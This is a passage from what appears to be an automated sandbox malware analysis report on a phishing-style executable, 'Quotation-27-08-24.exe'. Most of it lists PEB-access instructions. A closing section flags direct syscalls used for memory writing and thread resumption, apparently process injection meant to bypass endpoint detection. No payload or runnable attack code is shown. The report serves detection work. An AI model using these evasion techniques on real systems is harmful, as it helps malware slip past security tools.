            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0102866E mov eax, dword ptr fs:[00000030h]4_2_0102866E
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0102866E mov eax, dword ptr fs:[00000030h]4_2_0102866E
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F68770 mov eax, dword ptr fs:[00000030h]4_2_00F68770
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F70770 mov eax, dword ptr fs:[00000030h]4_2_00F70770
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F70770 mov eax, dword ptr fs:[00000030h]4_2_00F70770
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F70770 mov eax, dword ptr fs:[00000030h]4_2_00F70770
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F70770 mov eax, dword ptr fs:[00000030h]4_2_00F70770
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F70770 mov eax, dword ptr fs:[00000030h]4_2_00F70770
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F70770 mov eax, dword ptr fs:[00000030h]4_2_00F70770
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F70770 mov eax, dword ptr fs:[00000030h]4_2_00F70770
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F70770 mov eax, dword ptr fs:[00000030h]4_2_00F70770
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F70770 mov eax, dword ptr fs:[00000030h]4_2_00F70770
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F70770 mov eax, dword ptr fs:[00000030h]4_2_00F70770
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F70770 mov eax, dword ptr fs:[00000030h]4_2_00F70770
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F70770 mov eax, dword ptr fs:[00000030h]4_2_00F70770
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FEE75D mov eax, dword ptr fs:[00000030h]4_2_00FEE75D
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F60750 mov eax, dword ptr fs:[00000030h]4_2_00F60750
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2750 mov eax, dword ptr fs:[00000030h]4_2_00FA2750
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA2750 mov eax, dword ptr fs:[00000030h]4_2_00FA2750
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE4755 mov eax, dword ptr fs:[00000030h]4_2_00FE4755
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9674D mov esi, dword ptr fs:[00000030h]4_2_00F9674D
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9674D mov eax, dword ptr fs:[00000030h]4_2_00F9674D
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9674D mov eax, dword ptr fs:[00000030h]4_2_00F9674D
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9273C mov eax, dword ptr fs:[00000030h]4_2_00F9273C
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9273C mov ecx, dword ptr fs:[00000030h]4_2_00F9273C
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9273C mov eax, dword ptr fs:[00000030h]4_2_00F9273C
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FDC730 mov eax, dword ptr fs:[00000030h]4_2_00FDC730
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9C720 mov eax, dword ptr fs:[00000030h]4_2_00F9C720
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9C720 mov eax, dword ptr fs:[00000030h]4_2_00F9C720
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F60710 mov eax, dword ptr fs:[00000030h]4_2_00F60710
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F90710 mov eax, dword ptr fs:[00000030h]4_2_00F90710
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9C700 mov eax, dword ptr fs:[00000030h]4_2_00F9C700
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9C8F9 mov eax, dword ptr fs:[00000030h]4_2_00F9C8F9
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9C8F9 mov eax, dword ptr fs:[00000030h]4_2_00F9C8F9
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8E8C0 mov eax, dword ptr fs:[00000030h]4_2_00F8E8C0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FEC89D mov eax, dword ptr fs:[00000030h]4_2_00FEC89D
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F60887 mov eax, dword ptr fs:[00000030h]4_2_00F60887
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01004978 mov eax, dword ptr fs:[00000030h]4_2_01004978
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01004978 mov eax, dword ptr fs:[00000030h]4_2_01004978
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FEE872 mov eax, dword ptr fs:[00000030h]4_2_00FEE872
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FEE872 mov eax, dword ptr fs:[00000030h]4_2_00FEE872
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FF6870 mov eax, dword ptr fs:[00000030h]4_2_00FF6870
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FF6870 mov eax, dword ptr fs:[00000030h]4_2_00FF6870
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F90854 mov eax, dword ptr fs:[00000030h]4_2_00F90854
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F64859 mov eax, dword ptr fs:[00000030h]4_2_00F64859
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F64859 mov eax, dword ptr fs:[00000030h]4_2_00F64859
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F72840 mov ecx, dword ptr fs:[00000030h]4_2_00F72840
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9A830 mov eax, dword ptr fs:[00000030h]4_2_00F9A830
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F82835 mov eax, dword ptr fs:[00000030h]4_2_00F82835
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F82835 mov eax, dword ptr fs:[00000030h]4_2_00F82835
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F82835 mov eax, dword ptr fs:[00000030h]4_2_00F82835
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F82835 mov ecx, dword ptr fs:[00000030h]4_2_00F82835
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F82835 mov eax, dword ptr fs:[00000030h]4_2_00F82835
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F82835 mov eax, dword ptr fs:[00000030h]4_2_00F82835
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0102A9D3 mov eax, dword ptr fs:[00000030h]4_2_0102A9D3
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FEC810 mov eax, dword ptr fs:[00000030h]4_2_00FEC810
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F929F9 mov eax, dword ptr fs:[00000030h]4_2_00F929F9
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F929F9 mov eax, dword ptr fs:[00000030h]4_2_00F929F9
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FEE9E0 mov eax, dword ptr fs:[00000030h]4_2_00FEE9E0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6A9D0 mov eax, dword ptr fs:[00000030h]4_2_00F6A9D0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6A9D0 mov eax, dword ptr fs:[00000030h]4_2_00F6A9D0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6A9D0 mov eax, dword ptr fs:[00000030h]4_2_00F6A9D0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6A9D0 mov eax, dword ptr fs:[00000030h]4_2_00F6A9D0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6A9D0 mov eax, dword ptr fs:[00000030h]4_2_00F6A9D0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6A9D0 mov eax, dword ptr fs:[00000030h]4_2_00F6A9D0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F949D0 mov eax, dword ptr fs:[00000030h]4_2_00F949D0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100483A mov eax, dword ptr fs:[00000030h]4_2_0100483A
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100483A mov eax, dword ptr fs:[00000030h]4_2_0100483A
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FF69C0 mov eax, dword ptr fs:[00000030h]4_2_00FF69C0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE89B3 mov esi, dword ptr fs:[00000030h]4_2_00FE89B3
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE89B3 mov eax, dword ptr fs:[00000030h]4_2_00FE89B3
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE89B3 mov eax, dword ptr fs:[00000030h]4_2_00FE89B3
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F729A0 mov eax, dword ptr fs:[00000030h]4_2_00F729A0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F729A0 mov eax, dword ptr fs:[00000030h]4_2_00F729A0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F729A0 mov eax, dword ptr fs:[00000030h]4_2_00F729A0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F729A0 mov eax, dword ptr fs:[00000030h]4_2_00F729A0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F729A0 mov eax, dword ptr fs:[00000030h]4_2_00F729A0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F729A0 mov eax, dword ptr fs:[00000030h]4_2_00F729A0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F729A0 mov eax, dword ptr fs:[00000030h]4_2_00F729A0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F729A0 mov eax, dword ptr fs:[00000030h]4_2_00F729A0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F729A0 mov eax, dword ptr fs:[00000030h]4_2_00F729A0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F729A0 mov eax, dword ptr fs:[00000030h]4_2_00F729A0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F729A0 mov eax, dword ptr fs:[00000030h]4_2_00F729A0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F729A0 mov eax, dword ptr fs:[00000030h]4_2_00F729A0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F729A0 mov eax, dword ptr fs:[00000030h]4_2_00F729A0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F609AD mov eax, dword ptr fs:[00000030h]4_2_00F609AD
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F609AD mov eax, dword ptr fs:[00000030h]4_2_00F609AD
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FEC97C mov eax, dword ptr fs:[00000030h]4_2_00FEC97C
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA096E mov eax, dword ptr fs:[00000030h]4_2_00FA096E
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA096E mov edx, dword ptr fs:[00000030h]4_2_00FA096E
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FA096E mov eax, dword ptr fs:[00000030h]4_2_00FA096E
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F86962 mov eax, dword ptr fs:[00000030h]4_2_00F86962
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F86962 mov eax, dword ptr fs:[00000030h]4_2_00F86962
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F86962 mov eax, dword ptr fs:[00000030h]4_2_00F86962
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE0946 mov eax, dword ptr fs:[00000030h]4_2_00FE0946
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FE892A mov eax, dword ptr fs:[00000030h]4_2_00FE892A
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FF892B mov eax, dword ptr fs:[00000030h]4_2_00FF892B
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0102A8E4 mov eax, dword ptr fs:[00000030h]4_2_0102A8E4
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FEC912 mov eax, dword ptr fs:[00000030h]4_2_00FEC912
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F58918 mov eax, dword ptr fs:[00000030h]4_2_00F58918
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F58918 mov eax, dword ptr fs:[00000030h]4_2_00F58918
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FDE908 mov eax, dword ptr fs:[00000030h]4_2_00FDE908
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FDE908 mov eax, dword ptr fs:[00000030h]4_2_00FDE908
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9AAEE mov eax, dword ptr fs:[00000030h]4_2_00F9AAEE
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9AAEE mov eax, dword ptr fs:[00000030h]4_2_00F9AAEE
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F60AD0 mov eax, dword ptr fs:[00000030h]4_2_00F60AD0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F94AD0 mov eax, dword ptr fs:[00000030h]4_2_00F94AD0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F94AD0 mov eax, dword ptr fs:[00000030h]4_2_00F94AD0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01028B28 mov eax, dword ptr fs:[00000030h]4_2_01028B28
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01028B28 mov eax, dword ptr fs:[00000030h]4_2_01028B28
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FB6ACC mov eax, dword ptr fs:[00000030h]4_2_00FB6ACC
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FB6ACC mov eax, dword ptr fs:[00000030h]4_2_00FB6ACC
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FB6ACC mov eax, dword ptr fs:[00000030h]4_2_00FB6ACC
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0102AB40 mov eax, dword ptr fs:[00000030h]4_2_0102AB40
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01008B42 mov eax, dword ptr fs:[00000030h]4_2_01008B42
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01014B4B mov eax, dword ptr fs:[00000030h]4_2_01014B4B
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01014B4B mov eax, dword ptr fs:[00000030h]4_2_01014B4B
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100EB50 mov eax, dword ptr fs:[00000030h]4_2_0100EB50
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F68AA0 mov eax, dword ptr fs:[00000030h]4_2_00F68AA0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F68AA0 mov eax, dword ptr fs:[00000030h]4_2_00F68AA0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FB6AA4 mov eax, dword ptr fs:[00000030h]4_2_00FB6AA4
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F98A90 mov edx, dword ptr fs:[00000030h]4_2_00F98A90
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6EA80 mov eax, dword ptr fs:[00000030h]4_2_00F6EA80
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6EA80 mov eax, dword ptr fs:[00000030h]4_2_00F6EA80
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6EA80 mov eax, dword ptr fs:[00000030h]4_2_00F6EA80
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6EA80 mov eax, dword ptr fs:[00000030h]4_2_00F6EA80
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6EA80 mov eax, dword ptr fs:[00000030h]4_2_00F6EA80
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6EA80 mov eax, dword ptr fs:[00000030h]4_2_00F6EA80
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6EA80 mov eax, dword ptr fs:[00000030h]4_2_00F6EA80
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6EA80 mov eax, dword ptr fs:[00000030h]4_2_00F6EA80
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F6EA80 mov eax, dword ptr fs:[00000030h]4_2_00F6EA80
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FDCA72 mov eax, dword ptr fs:[00000030h]4_2_00FDCA72
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FDCA72 mov eax, dword ptr fs:[00000030h]4_2_00FDCA72
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9CA6F mov eax, dword ptr fs:[00000030h]4_2_00F9CA6F
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9CA6F mov eax, dword ptr fs:[00000030h]4_2_00F9CA6F
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9CA6F mov eax, dword ptr fs:[00000030h]4_2_00F9CA6F
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F66A50 mov eax, dword ptr fs:[00000030h]4_2_00F66A50
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F66A50 mov eax, dword ptr fs:[00000030h]4_2_00F66A50
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F66A50 mov eax, dword ptr fs:[00000030h]4_2_00F66A50
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F66A50 mov eax, dword ptr fs:[00000030h]4_2_00F66A50
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F66A50 mov eax, dword ptr fs:[00000030h]4_2_00F66A50
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F66A50 mov eax, dword ptr fs:[00000030h]4_2_00F66A50
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F66A50 mov eax, dword ptr fs:[00000030h]4_2_00F66A50
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F70A5B mov eax, dword ptr fs:[00000030h]4_2_00F70A5B
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F70A5B mov eax, dword ptr fs:[00000030h]4_2_00F70A5B
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01014BB0 mov eax, dword ptr fs:[00000030h]4_2_01014BB0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01014BB0 mov eax, dword ptr fs:[00000030h]4_2_01014BB0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9CA38 mov eax, dword ptr fs:[00000030h]4_2_00F9CA38
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F84A35 mov eax, dword ptr fs:[00000030h]4_2_00F84A35
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F84A35 mov eax, dword ptr fs:[00000030h]4_2_00F84A35
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100EBD0 mov eax, dword ptr fs:[00000030h]4_2_0100EBD0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8EA2E mov eax, dword ptr fs:[00000030h]4_2_00F8EA2E
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F9CA24 mov eax, dword ptr fs:[00000030h]4_2_00F9CA24
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FECA11 mov eax, dword ptr fs:[00000030h]4_2_00FECA11
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8EBFC mov eax, dword ptr fs:[00000030h]4_2_00F8EBFC
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F68BF0 mov eax, dword ptr fs:[00000030h]4_2_00F68BF0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F68BF0 mov eax, dword ptr fs:[00000030h]4_2_00F68BF0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F68BF0 mov eax, dword ptr fs:[00000030h]4_2_00F68BF0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FECBF0 mov eax, dword ptr fs:[00000030h]4_2_00FECBF0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F80BCB mov eax, dword ptr fs:[00000030h]4_2_00F80BCB
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F80BCB mov eax, dword ptr fs:[00000030h]4_2_00F80BCB
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F80BCB mov eax, dword ptr fs:[00000030h]4_2_00F80BCB
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F60BCD mov eax, dword ptr fs:[00000030h]4_2_00F60BCD
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F60BCD mov eax, dword ptr fs:[00000030h]4_2_00F60BCD
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F60BCD mov eax, dword ptr fs:[00000030h]4_2_00F60BCD
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F70BBE mov eax, dword ptr fs:[00000030h]4_2_00F70BBE
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F70BBE mov eax, dword ptr fs:[00000030h]4_2_00F70BBE
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_0100EA60 mov eax, dword ptr fs:[00000030h]4_2_0100EA60
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01034A80 mov eax, dword ptr fs:[00000030h]4_2_01034A80
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5CB7E mov eax, dword ptr fs:[00000030h]4_2_00F5CB7E
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FF6B40 mov eax, dword ptr fs:[00000030h]4_2_00FF6B40
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FF6B40 mov eax, dword ptr fs:[00000030h]4_2_00FF6B40
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8EB20 mov eax, dword ptr fs:[00000030h]4_2_00F8EB20
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F8EB20 mov eax, dword ptr fs:[00000030h]4_2_00F8EB20
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FDEB1D mov eax, dword ptr fs:[00000030h]4_2_00FDEB1D
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FDEB1D mov eax, dword ptr fs:[00000030h]4_2_00FDEB1D
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FDEB1D mov eax, dword ptr fs:[00000030h]4_2_00FDEB1D
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FDEB1D mov eax, dword ptr fs:[00000030h]4_2_00FDEB1D
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FDEB1D mov eax, dword ptr fs:[00000030h]4_2_00FDEB1D
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FDEB1D mov eax, dword ptr fs:[00000030h]4_2_00FDEB1D
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FDEB1D mov eax, dword ptr fs:[00000030h]4_2_00FDEB1D
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FDEB1D mov eax, dword ptr fs:[00000030h]4_2_00FDEB1D
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00FDEB1D mov eax, dword ptr fs:[00000030h]4_2_00FDEB1D
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F92CF0 mov eax, dword ptr fs:[00000030h]4_2_00F92CF0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F92CF0 mov eax, dword ptr fs:[00000030h]4_2_00F92CF0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F92CF0 mov eax, dword ptr fs:[00000030h]4_2_00F92CF0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F92CF0 mov eax, dword ptr fs:[00000030h]4_2_00F92CF0
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01018D10 mov eax, dword ptr fs:[00000030h]4_2_01018D10
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_01018D10 mov eax, dword ptr fs:[00000030h]4_2_01018D10
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F5CCC8 mov eax, dword ptr fs:[00000030h]4_2_00F5CCC8
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F88CB1 mov eax, dword ptr fs:[00000030h]4_2_00F88CB1
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeCode function: 4_2_00F88CB1 mov eax, dword ptr fs:[00000030h]4_2_00F88CB1
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
